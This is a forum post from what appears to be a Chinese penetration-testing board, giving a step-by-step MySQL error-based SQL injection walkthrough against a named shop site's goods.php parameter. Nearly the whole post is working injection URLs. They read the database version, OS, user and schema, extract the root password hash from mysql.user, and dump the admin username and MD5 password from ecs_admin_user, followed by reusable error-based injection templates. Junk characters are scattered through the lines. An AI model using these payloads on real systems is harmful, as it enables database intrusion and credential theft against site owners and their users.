找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2042|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
# R& }& X& o& U2 @% A6 m: hhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: P5 ~; J# L0 }6 P+ }1 @# t

: `5 K/ w5 z. a. v& }* a# ~判断系统+ D8 u; S% M; D& i' x: H! t
! c* J  I9 b5 a: @% S) m% @4 }& g: k
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%234 i# A* b4 ^1 {! }

% f* d( ~3 V9 _# m/ |* X% [: ?/ D2 G! [3 i; K- I" w+ e7 r7 l) l

5 ?/ Q5 Y  U8 @5 J! w5 c! n( n当前 user()
& _: c0 S6 B$ j2 K1 Q
4 n4 K8 ]& e& [' S& |7 D+ Mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' R* C( g' t/ A: P

2 @4 m* R7 }$ @! H& K! U6 m8 A+ k5 m" ~
4 i. o) }) k/ |# S; o# R
当前 database()
' v, `, d) K& C) @http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 d8 [$ B8 r8 @% k% Q: ~6 ^; x

" P  V" K6 A5 r' x9 q1 h! B, Z+ v* c! ~/ T
6 }1 M2 G; F0 \
' u. c2 C- H; H$ ~, A0 K
root hash
7 y( T, N9 @& O6 f
. a  Y# B. z7 ^& ?- rhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) T% x* f1 s0 h% S, J" Z
. i6 L, q. h( Y- q
8 E7 s! |- T# P3 {, {

. s7 D1 [+ n5 l. w3 h$ n6 t' k9 ]- O当前 数据库表名" Q9 u4 m  i# V( o3 U* Q9 Q

' l$ H3 \& V# r$ ?& U* khttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 R  A2 ~. j2 I3 w9 w" P4 u

* o+ q+ y' a" c7 L
" H* }& z- \6 A+ L& u# B0 ?
# P  r/ h0 C* v( X# ?1 s9 O  k当前 数据库 user_name 字段  W$ k& d) w2 a1 ^" X) T8 X* E

( @) v& E" G$ Q* t$ c! O4 uhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23( i/ d* r  Z8 d9 C% K) u$ A. Z

1 X% p% X) U% A) V当前 数据库 字段 password* G3 Y' B0 Z0 Y4 P+ L
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
; t" B: I9 a1 ?# v
2 r2 z8 s+ `" V
: u3 U6 e# y1 M4 F$ s5 j- {
- r0 R$ F5 ^- [2 o# s, O获得 admin passwd(md5)
. w" t3 ^& G7 }7 W6 `
, n1 N% n, c# R. q- j9 r
0 D; d( w5 H: j% N9 |) n& t" e& D+ ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
# u% u: \( j) S9 e
. S* L8 ]3 i7 \# a1 v报错注射' w6 m- j9 @: C+ e4 g  Q
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
. k7 p4 Q" e" z9 G1 E, _! m) A) K
+ Q7 r' b3 q* K, D, p7 XSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)3 s: p0 G$ X+ y3 ~
# i& H3 ]5 W- v5 Q* q% X# [, l
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表